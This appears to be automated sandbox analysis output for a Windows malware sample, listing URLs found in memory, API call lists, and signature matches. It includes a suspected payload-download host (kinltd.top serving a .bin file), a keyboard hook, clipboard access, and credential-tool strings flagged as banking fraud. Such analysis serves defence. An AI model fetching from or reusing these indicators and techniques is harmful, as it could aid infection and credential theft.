              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.0000000005498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kinltd.top/
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.0000000005498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kinltd.top/a
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kinltd.top/xeInzY158.bin
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kinltd.top/xeInzY158.binra
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: z120X20SO__UK__EKMELAMA.exe, 00000006.00000003.2608802815.0000000000B5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
              Source: z120X20SO__UK__EKMELAMA.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: z120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: z120X20SO__UK__EKMELAMA.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://www.office.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownHTTPS traffic detected: 104.21.24.17:443 -> 192.168.2.4:49868 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_0040535C
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_0040987A
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_004098E2
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_00406DFC
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_00406E9F
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,8_2_004068B5
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,8_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: z120X20SO__UK__EKMELAMA.exe PID: 5500, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kaourts.dat, type: DROPPED
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,6_2_0040DD85
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00401806 NtdllDefWindowProc_W,6_2_00401806
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_004018C0 NtdllDefWindowProc_W,6_2_004018C0
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_004016FD NtdllDefWindowProc_A,7_2_004016FD
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_004017B7 NtdllDefWindowProc_A,7_2_004017B7
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_00402CAC NtdllDefWindowProc_A,8_2_00402CAC
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_00402D66 NtdllDefWindowProc_A,8_2_00402D66
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403348
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile created: C:\Windows\resources\0809Jump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_004069450_2_00406945
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_0040711C0_2_0040711C
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_6F951A980_2_6F951A98
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_004069454_2_00406945
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_0040711C4_2_0040711C
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_368671944_2_36867194
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_3685B5C14_2_3685B5C1
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0044B0406_2_0044B040
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0043610D6_2_0043610D
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_004473106_2_00447310
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0044A4906_2_0044A490
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0040755A6_2_0040755A
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0043C5606_2_0043C560
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0044B6106_2_0044B610
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0044D6C06_2_0044D6C0
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_004476F06_2_004476F0
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0044B8706_2_0044B870
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0044081D6_2_0044081D
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_004149576_2_00414957
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_004079EE6_2_004079EE
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00407AEB6_2_00407AEB
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0044AA806_2_0044AA80
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00412AA96_2_00412AA9
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00404B746_2_00404B74
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00404B036_2_00404B03
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0044BBD86_2_0044BBD8
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00404BE56_2_00404BE5
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00404C766_2_00404C76
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00415CFE6_2_00415CFE
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00416D726_2_00416D72
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00446D306_2_00446D30
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00446D8B6_2_00446D8B
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00406E8F6_2_00406E8F
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_004050387_2_00405038
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_0041208C7_2_0041208C
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_004050A97_2_004050A9
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_0040511A7_2_0040511A
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_0043C13A7_2_0043C13A
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_004051AB7_2_004051AB
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_004493007_2_00449300
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_0040D3227_2_0040D322
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_0044A4F07_2_0044A4F0
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_0043A5AB7_2_0043A5AB
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_004136317_2_00413631
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_004466907_2_00446690
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_0044A7307_2_0044A730
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_004398D87_2_004398D8
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_004498E07_2_004498E0
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_0044A8867_2_0044A886
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_0043DA097_2_0043DA09
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_00438D5E7_2_00438D5E
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_00449ED07_2_00449ED0
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_0041FE837_2_0041FE83
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_00430F547_2_00430F54
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_004050C28_2_004050C2
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_004014AB8_2_004014AB
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_004051338_2_00405133
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_004051A48_2_004051A4
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_004012468_2_00401246
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_0040CA468_2_0040CA46
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_004052358_2_00405235
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_004032C88_2_004032C8
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_004222D98_2_004222D9
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_004016898_2_00401689
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_00402F608_2_00402F60
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: String function: 00402BCE appears 50 times
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: String function: 00416760 appears 69 times
              Source: z120X20SO__UK__EKMELAMA.exeStatic PE information: invalid certificate
              Source: z120X20SO__UK__EKMELAMA.exe, 00000000.00000000.1663193927.0000000000444000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesyveres.exeP vs z120X20SO__UK__EKMELAMA.exe
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2610368055.0000000005562000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs z120X20SO__UK__EKMELAMA.exe
